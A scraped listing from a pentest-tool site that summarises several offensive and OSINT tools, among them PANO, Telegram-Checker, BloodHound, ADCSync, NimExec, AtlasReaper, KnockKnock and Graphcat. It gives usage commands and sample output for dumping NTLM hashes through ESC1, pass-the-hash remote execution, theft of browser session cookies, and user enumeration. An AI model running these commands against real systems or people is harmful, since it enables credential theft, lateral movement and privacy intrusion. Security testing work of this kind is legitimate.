There are new available articles, click to refresh the page.

PANO - Advanced OSINT Investigation Platform Combining Graph Visualization, Timeline Analysis, And AI Assistance To Uncover Hidden Connections In Data

By: Unknown — April 17^th 2025 at 19:48

PANO is a powerful OSINT investigation platform that combines graph visualization, timeline analysis, and AI-powered tools to help you uncover hidden connections and patterns in your data.

Getting Started

Clone the repository: bash git clone https://github.com/ALW1EZ/PANO.git cd PANO
Run the application:
Linux: ./start_pano.sh
Windows: start_pano.bat

The startup script will automatically: - Check for updates - Set up the Python environment - Install dependencies - Launch PANO

In order to use Email Lookup transform You need to login with GHunt first. After starting the pano via starter scripts;

Select venv manually
Linux: source venv/bin/activate
Windows: call venv\Scripts\activate
See how to login here

💡 Quick Start Guide

Create Investigation: Start a new investigation or load an existing one
Add Entities: Drag entities from the sidebar onto the graph
Discover Connections: Use transforms to automatically find relationships
Analyze: Use timeline and map views to understand patterns
Save: Export your investigation for later use

🔍 Features

🕸️ Core Functionality

Interactive Graph Visualization
Drag-and-drop entity creation
Multiple layout algorithms (Circular, Hierarchical, Radial, Force-Directed)
Dynamic relationship mapping
Visual node and edge styling
Timeline Analysis
Chronological event visualization
Interactive timeline navigation
Event filtering and grouping
Temporal relationship analysis
Map Integration
Geographic data visualization
Location-based analysis
Interactive mapping features
Coordinate plotting and tracking

🎯 Entity Management

Supported Entity Types
📧 Email addresses
👤 Usernames
🌐 Websites
🖼️ Images
📍 Locations
⏰ Events
📝 Text content
🔧 Custom entity types

🔄 Transform System

Email Analysis
Google account investigation
Calendar event extraction
Location history analysis
Connected services discovery
Username Analysis
Cross-platform username search
Social media profile discovery
Platform correlation
Web presence analysis
Image Analysis
Reverse image search
Visual content analysis
Metadata extraction
Related image discovery

🤖 AI Integration

PANAI
Natural language investigation assistant
Automated entity extraction and relationship mapping
Pattern recognition and anomaly detection
Multi-language support
Context-aware suggestions
Timeline and graph analysis

🧩 Core Components

📦 Entities

Entities are the fundamental building blocks of PANO. They represent distinct pieces of information that can be connected and analyzed:

Built-in Types
📧 Email: Email addresses with service detection
👤 Username: Social media and platform usernames
🌐 Website: Web pages with metadata
🖼️ Image: Images with EXIF and analysis
📍 Location: Geographic coordinates and addresses
⏰ Event: Time-based occurrences
📝 Text: Generic text content
Properties System
Type-safe property validation
Automatic property getters
Dynamic property updates
Custom property types
Metadata support

⚡ Transforms

Transforms are automated operations that process entities to discover new information and relationships:

Operation Types
🔍 Discovery: Find new entities from existing ones
🔗 Correlation: Connect related entities
📊 Analysis: Extract insights from entity data
🌐 OSINT: Gather open-source intelligence
🔄 Enrichment: Add data to existing entities
Features
Async operation support
Progress tracking
Error handling
Rate limiting
Result validation

🛠️ Helpers

Helpers are specialized tools with dedicated UIs for specific investigation tasks:

Available Helpers
🔍 Cross-Examination: Analyze statements and testimonies
👤 Portrait Creator: Generate facial composites
📸 Media Analyzer: Advanced image processing and analysis
🔍 Base Searcher: Search near places of interest
🔄 Translator: Translate text between languages
Helper Features
Custom Qt interfaces
Real-time updates
Graph integration
Data visualization
Export capabilities

👥 Contributing

We welcome contributions! To contribute to PANO:

Fork the repository at https://github.com/ALW1EZ/PANO/
Make your changes in your fork
Test your changes thoroughly
Create a Pull Request to our main branch
In your PR description, include:
What the changes do
Why you made these changes
Any testing you've done
Screenshots if applicable

Note: We use a single main branch for development. All pull requests should be made directly to main.

📖 Development Guide

Click to expand development documentation

### System Requirements - Operating System: Windows or Linux - Python 3.11+ - PySide6 for GUI - Internet connection for online features ### Custom Entities Entities are the core data structures in PANO. Each entity represents a piece of information with specific properties and behaviors. To create a custom entity: 1. Create a new file in the `entities` folder (e.g., `entities/phone_number.py`) 2. Implement your entity class:

from dataclasses import dataclass
from typing import ClassVar, Dict, Any
from .base import Entity

@dataclass
class PhoneNumber(Entity):
    name: ClassVar[str] = "Phone Number"
    description: ClassVar[str] = "A phone number entity with country code and validation"

    def init_properties(self):
        """Initialize phone number properties"""
        self.setup_properties({
            "number": str,
            "country_code": str,
            "carrier": str,
            "type": str,  # mobile, landline, etc.
            "verified": bool
        })

    def update_label(self):
        """Update the display label"""
        self.label = self.format_label(["country_code", "number"])

### Custom Transforms Transforms are operations that process entities and generate new insights or relationships. To create a custom transform: 1. Create a new file in the `transforms` folder (e.g., `transforms/phone_lookup.py`) 2. Implement your transform class:

from dataclasses import dataclass
from typing import ClassVar, List
from .base import Transform
from entities.base import Entity
from entities.phone_number import PhoneNumber
from entities.location import Location
from ui.managers.status_manager import StatusManager

@dataclass
class PhoneLookup(Transform):
    name: ClassVar[str] = "Phone Number Lookup"
    description: ClassVar[str] = "Lookup phone number details and location"
    input_types: ClassVar[List[str]] = ["PhoneNumber"]
    output_types: ClassVar[List[str]] = ["Location"]

    async def run(self, entity: PhoneNumber, graph) -> List[Entity]:
        if not isinstance(entity, PhoneNumber):
            return []

        status = StatusManager.get()
        operation_id = status.start_loading("Phone Lookup")

        try:
            # Your phone number lookup logic here
            # Example: query an API for phone number details
            location = Location(properties={
                "country": "Example Country",
                "region": "Example Region",
                "carrier": "Example Carrier",
                "source": "PhoneLookup transform"
            })

            return [location]

        except Exception as e:
            status.set_text(f"Error during phone lookup: {str(e)}")
            return []

        finally:
            status.stop_loading(operation_id)

### Custom Helpers Helpers are specialized tools that provide additional investigation capabilities through a dedicated UI interface. To create a custom helper: 1. Create a new file in the `helpers` folder (e.g., `helpers/data_analyzer.py`) 2. Implement your helper class:

from PySide6.QtWidgets import (
    QWidget, QVBoxLayout, QHBoxLayout, QPushButton,
    QTextEdit, QLabel, QComboBox
)
from .base import BaseHelper
from qasync import asyncSlot

class DummyHelper(BaseHelper):
    """A dummy helper for testing"""

    name = "Dummy Helper" 
    description = "A dummy helper for testing"

    def setup_ui(self):
        """Initialize the helper's user interface"""
        # Create input text area
        self.input_label = QLabel("Input:")
        self.input_text = QTextEdit()
        self.input_text.setPlaceholderText("Enter text to process...")
        self.input_text.setMinimumHeight(100)

        # Create operation selector
        operation_layout = QHBoxLayout()
        self.operation_label = QLabel("Operation:")
        self.operation_combo = QComboBox()
        self.operation_combo.addItems(["Uppercase", "Lowercase", "Title Case"])
        operation_layout.addWidget(self.operation_label)
        operation_layout.addWidget(self.operation_combo)

        # Create process button
        self.process_btn = QPushButton("Process")
        self.process_btn.clicked.connect(self.process_text)

        # Create output text area
        self.output_label = QLabel("Output:")
        self.output_text = QTextEdit()
        self.output_text.setReadOnly(True)
        self.output_text.setMinimumHeight(100)

        # Add widgets to main layout
        self.main_layout.addWidget(self.input_label)
        self.main_layout.addWidget(self.input_text)
        self.main_layout.addLayout(operation_layout)
        self.main_layout.addWidget(self.process_btn)
        self.main_layout.addWidget(self.output_label)
        self.main_layout.addWidget(self.output_text)

        # Set dialog size
        self.resize(400, 500)

    @asyncSlot()
    async def process_text(self):
        """Process the input text based on selected operation"""
        text = self.input_text.toPlainText()
        operation = self.operation_combo.currentText()

        if operation == "Uppercase":
            result = text.upper()
        elif operation == "Lowercase":
            result = text.lower()
        else:  # Title Case
            result = text.title()

        self.output_text.setPlainText(result)

📄 License

This project is licensed under the Creative Commons Attribution-NonCommercial (CC BY-NC) License.

You are free to: - ✅ Share: Copy and redistribute the material - ✅ Adapt: Remix, transform, and build upon the material

Under these terms: - ℹ️ Attribution: You must give appropriate credit - 🚫 NonCommercial: No commercial use - 🔓 No additional restrictions

🙏 Acknowledgments

Special thanks to all library authors and contributors who made this project possible.

👨‍💻 Author

Created by ALW1EZ with AI ❤️

Download PANO

KitPloit - PenTest Tools!

Telegram-Checker - A Python Tool For Checking Telegram Accounts Via Phone Numbers Or Usernames

By: Unknown — April 15^th 2025 at 12:30

Enhanced version of bellingcat's Telegram Phone Checker!

A Python script to check Telegram accounts using phone numbers or username.

✨ Features

🔍 Check single or multiple phone numbers and usernames
📁 Import numbers from text file
📸 Auto-download profile pictures
💾 Save results as JSON
🔐 Secure credential storage
📊 Detailed user information

🚀 Installation

Clone the repository:

git clone https://github.com/unnohwn/telegram-checker.git
cd telegram-checker

Install required packages:

pip install -r requirements.txt

📦 Requirements

Contents of requirements.txt:

telethon
rich
click
python-dotenv

Or install packages individually:

pip install telethon rich click python-dotenv

⚙️ Configuration

First time running the script, you'll need: - Telegram API credentials (get from https://my.telegram.org/apps) - Your Telegram phone number including countrycode + - Verification code (sent to your Telegram)

💻 Usage

Run the script:

python telegram_checker.py

Choose from options: 1. Check phone numbers from input 2. Check phone numbers from file 3. Check usernames from input 4. Check usernames from file 5. Clear saved credentials 6. Exit

📂 Output

Results are saved in: - results/ - JSON files with detailed information - profile_photos/ - Downloaded profile pictures

⚠️ Note

This tool is for educational purposes only. Please respect Telegram's terms of service and user privacy.

📄 License

MIT License

Download Telegram-Checker

KitPloit - PenTest Tools!

BloodHound - Six Degrees Of Domain Admin

By: Zion3R — March 4^th 2024 at 11:30

BloodHound is a monolithic web application composed of an embedded React frontend with Sigma.js and a Go based REST API backend. It is deployed with a Postgresql application database and a Neo4j graph database, and is fed by the SharpHound and AzureHound data collectors.

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

BloodHound CE is created and maintained by the BloodHound Enterprise Team. The original BloodHound was created by @_wald0, @CptJesus, and @harmj0y.

Running BloodHound Community Edition

The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.

Install Docker Compose and ensure Docker is running. This should be included with the Docker Desktop installation
Run curl -L https://ghst.ly/getbhce | docker compose -f - up
Locate the randomly generated password in the terminal output of Docker Compose
In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs

NOTE: going forward, the default docker-compose.yml example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in examples/docker-compose/README.md to configure the host binding for the container.

Installation Error Handling

If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry.

If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.

# Verify if Docker Engine is Running
docker info

# Attempt to stop Neo4j Service if running (on Windows)
Stop-Service "Neo4j" -ErrorAction SilentlyContinue

A successful installation of BloodHound CE would look like the below:

https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9

Useful Links

Contact

Please check out the Contact page in our wiki for details on how to reach out with questions and suggestions.

Download BloodHound

KitPloit - PenTest Tools!

ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R — January 19^th 2024 at 11:30

This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.

This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___    ____  ___________
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/  |_/_____/\____//____/\__, /_/ /_/\___/
                         /____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LO   CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

Valid Domain Credentials
A user list from a bloodhound dump that will be passed in.
A template vulnerable to ESC1 (Found with Certipy find)

# python3 adcsync.py --help
    ___    ____  ___________                 
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__  
/_/  |_/_____/\____//____/\__, /_/ /_/\___/  
                         /____/              

Usage: adcsync.py [OPTIONS]

Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound  [required]
  -o, --output TEXT    NTLM Hash Output file  [required]
  -ca TEXT             Certificate Authority  [required]
  -dc-ip TEXT          IP Address of Domain Controller  [required]
  -u, --user TEXT      Username  [required]
  -p, --password TEXT  Password  [required]
  -template TEXT       Template Name vulnerable to ESC1  [required]
  -target-ip TEXT      IP Address of th   e target machine  [required]
  --help               Show this message and exit.

TODO

Support alternative authentication methods such as NTLM hashes and ccache files
Automatically run "certipy find" to find and grab templates vulnerable to ESC1
Add jitter and sleep options to avoid detection
Add type validation for all variables

Acknowledgements

puzzlepeaches: Telling me to hurry up and write this
ly4k: For Certipy
WazeHell: For the script to set up the vulnerable AD environment used for testing

Download ADCSync

KitPloit - PenTest Tools!

NimExec - Fileless Command Execution For Lateral Movement In Nim

By: Zion3R — December 3^rd 2023 at 11:30

Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.

Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.

This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.

Compilation

nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname

Usage

test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

                                                                                             _..._     
                                                                                          .-'_..._''.  
   _..._   .--. __  __   ___         __.....__                          __.....__       .' .'      '.\ 
 .'     '. |__||  |/  `.'   `.   .-''         '.                    .-''         '.    / .'            
.   .-.   ..--.|   .-.  .-.   ' /     .-''"'-.  `.                 /     .-''"'-.  `. . '              
|  '   '  ||  ||  |  |  |  |  |/     /________\   \ ____     _____/     /________\   \| |              
|  |   |  ||  ||  |  |  |  |  ||                  |`.   \  .'    /|                  || |              
|  |   |  ||  ||  |  |  |  |  |\    .---   ----------'  `.  `'    .' \    .-------------'. '              
|  |   |  ||  ||  |  |  |  |  | \    '-.____...---.    '.    .'    \    '-.____...---. \ '.          . 
|  |   |  ||__||__|  |__|  |__|  `.             .'     .'     `.    `.             .'   '. `._____.-'/ 
|  |   |  |                        `''-...... -'     .'  .'`.   `.    `''-...... -'       `-.______ /  
|  |   |  |                                        .'   /    `.   `.                               `   
'--'   '--'                                       '----'       '----'                                  

                                            @R0h1rr1m          


[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained    services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                          Enable more verbose output.
    -u | --username <Username>              Username for NTLM Authentication.*
    -h | --hash <NTLM Hash>                 NTLM password hash for NTLM Authentication.*
    -t | --target <Target>                  Lateral movement target.*
    -c | --command <Command>                Command to execute.*
    -d | --domain <Domain>                  Domain name for NTLM Authentication.
    -s | --service <Service Name>           Name of the service instead of a random one.
    --help                                  Show the help message.

References

Download NimExec

KitPloit - PenTest Tools!

AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

By: Zion3R — September 26^th 2023 at 11:30

AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.

Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                   .@@@@
                                               @@@@@
                                            @@@@@   @@@@@@@
                                          @@@@@   @@@@@@@@@@@
                                         @@@@@  @@@@@@@@@@@@@@@
                                        @@@@,  @@@@        *@@@@
                                          @@@@ @@@  @@  @@@ .@@@
   _  _   _         ___                       @@@@@@@     @@@@@@
  /_\| |_| |__ _ __| _ \___ __ _ _ __  ___ _ _   @@   @@@@@@@@
 / _ \  _| / _` (_-<   / -_) _` | '_ \/ -_) '_|  @@   @@@@@@@@
/_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_|    @@@@@@@@   &@
                                |_|             @@@@@@@@@@  @@&
                                                @@@@@@@@@@@@@@@@@
                                               @@@@@@@@@@@@@@@@. @@
                                                     @werdhaihai

Usage

AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

.\AtlasReaper.exe [command] [subcommand] [options]

Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

Below is a list of available commands and subcommands:

Commands

Each command has sub commands for interacting with the specific product.

confluence
jira

Subcommands

Confluence

confluence attach - Attach a file to a page.
confluence download - Download an attachment.
confluence embed - Embed a 1x1 pixel image to perform farming attacks.
confluence link - Add a link to a page.
confluence listattachments - List attachments.
confluence listpages - List pages in Confluence.
confluence listspaces - List spaces in Confluence.
confluence search - Search Confluence.

Jira

jira addcomment - Add a comment to an issue.
jira attach - Attach a file to an issue.
jira createissue - Create a new issue.
jira download - Download attachment(s) from an issue.
jira listattachments - List attachments on an issue.
jira listissues - List issues in Jira.
jira listprojects - List projects in Jira.
jira listusers - List Atlassian users.
jira searchissues - Search issues in Jira.

Common Commands

help - Display more information on a specific command.

Examples

Here are a few examples of how to use AtlasReaper:

Search for a keyword in Confluence with wildcard search:

.\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie
Attach a file to a page in Confluence:

.\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie
Create a new issue in Jira:

.\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

Authentication

Confluence and Jira can be configured to allow anonymous access. You can check this by supplying omitting the -c/--cookie from the commands.

In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

.\SharpChrome.exe cookies /showall
Look for any cookies scoped to the *.atlassian.net named cloud.session.token or tenant.session.token

Limitations

Please note the following limitations of AtlasReaper:

The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
For write operations, the username associated with the user session token (or "anonymous") will be listed.

Contributing

If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.

Download AtlasReaper

KitPloit - PenTest Tools!

KnockKnock - Enumerate Valid Users Within Microsoft Teams And OneDrive With Clean Output

By: Zion3R — September 26^th 2023 at 01:34

Designed to validate potential usernames by querying OneDrive and/or Microsoft Teams, which are passive methods.
Additionally, it can output/create a list of legacy Skype users identified through Microsoft Teams enumeration.
Finally, it also creates a nice clean list for future usage, all conducted from a single tool.

Usage

$ python3 .\KnockKnock.py -h

  _  __                 _    _  __                 _
 | |/ /_ __   ___   ___| | _| |/ /_ __   ___   ___| | __
 | ' /| '_ \ / _ \ / __| |/ / ' /| '_ \ / _ \ / __| |/ /
 | . \| | | | (_) | (__|   <| . \| | | | (_) | (__|   <
 |_|\_\_| |_|\___/ \___|_|\_\_|\_\_| |_|\___/ \___|_|\_\
   v0.9                             Author: @waffl3ss


usage: KnockKnock.py [-h] [-teams] [-onedrive] [-l] -i INPUTLIST [-o OUTPUTFILE] -d TARGETDOMAIN [-t TEAMSTOKEN] [-threads MAXTHREADS] [-v]

options:
  -h, --help           show this help message and exit
  -teams               Run the Teams User Enumeration Module
  -onedrive            Run the One Drive Enumeration Module
  -l                      Write legacy skype users to a seperate file
  -i INPUTLIST         Input file with newline-seperated users to check
  -o OUTPUTFILE        Write output to file
  -d TARGETDOMAIN      Domain to target
  -t TEAMSTOKEN        Teams Token (file containing token or a string)
  -threads MAXTHREADS  Number of threads to use in the Teams User Enumeration (default = 10)
  -v                   Show verbose errors

Examples

./KnockKnock.py -teams -i UsersList.txt -d Example.com -o OutFile.txt -t BearerToken.txt
./KnockKnock.py -onedrive -i UsersList.txt -d Example.com -o OutFile.txt
./KnockKnock.py -onedrive -teams -i UsersList.txt -d Example.com -t BearerToken.txt -l

Options

You can select one or both modes, as long as the appropriate options are provided for the modules selected.
Both modules will require the domain flag (-d) and the user input list (-i).
The tool does not require an output file as an option, and if not supplied, it will print to screen only.
The verbose mode will show A LOT of extra information, including users that are not valid.
The Teams option requires a bearer token. The script automatically removes the beginning and end portions to use only whats required.

How to get your Bearer token

To get your bearer token, you will need a Cookie Manager plugin on your browser and login to your own Microsoft Teams through the browser.
Next, view the cookies related to the current webpage (teams.microsoft.com).
The cookie you are looking for is for the domain .teams.microsoft.com and is titled "authtoken".
You can copy the whole token as the script will split out the required part for you.

References

@nyxgeek - onedrive_user_enum
@immunIT - TeamsUserEnum

Download KnockKnock

KitPloit - PenTest Tools!

Graphcat - Generate Graphs And Charts Based On Password Cracking Result

By: Zion3R — June 2^nd 2023 at 12:30

Simple script to generate graphs and charts on hashcat (and john) potfile and ntds

Install

git clone https://github.com/Orange-Cyberdefense/graphcat
cd graphcat
pip install .

Helper

$ graphcat.py -h
usage: graphcat.py [-h] -potfile hashcat.potfile -hashfile hashfile.txt [-john] [-format FORMAT] [-export-charts] [-output-dir OUTPUT_DIR] [-debug]

Password Cracking Graph Reporting

options:
  -h, --help            show this help message and exit
  -potfile hashcat.potfile
Hashcat Potfile
  -hashfile hashfile.txt
                        File containing hashes (one per line)
  -john                 John potfile
  -format FORMAT        hashfile format (default 3): 1 for hash; 2 for username:hash; 3 for secretsdump (username:uid:lm:ntlm)
  -export-charts        Output also charts in png
  -output-dir OUTPUT_DIR
                        Output directory
  -debug                Turn DEB   UG output ON

Usage

Graphcat just need a potfile with -potfile (default is hashcat, but you can use -john to submit a john potfile) and a hashfile with -hashfile. The hashfile should be in a specific format from the 3 availables formats with -format flag. Default is Secretsdump.

The tool will generate a report with multiple password cracking charts. You can get charts in png with the -export-charts flag.

$ graphcat.py -hashfile entreprise.local.ntds -potfile hashcat.pot
[-] Parsing potfile
[-] 164 entries in potfile
[-] Parsing hashfile
[-] 1600 entries in hashfile
[-] Generating graphs...
[-] Generating report...
[-] Report available at graphcat_1672941324.pdf

Formats

1: Only Hash

aad3b435b51404eeaad3b435b51404ee
aad3b435b51404eeaad3b435b51404ee
aad3b435b51404eeaad3b435b51404ee

2: Username + Hash

test1:aad3b435b51404eeaad3b435b51404ee
test2:aad3b435b51404eeaad3b435b51404ee
test3:aad3b435b51404eeaad3b435b51404ee

3: Secretsdump

waza.local\test1:4268:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
waza.local\test2:4269:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
waza.local\test3:4270:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::

If a hash occurs more than once in the hash file, it will be counted that many times.

Moreover, if you submit secretsdump with password history (-history in secretsdump command), it will analyze similarity in password history

Charts example

Download Graphcat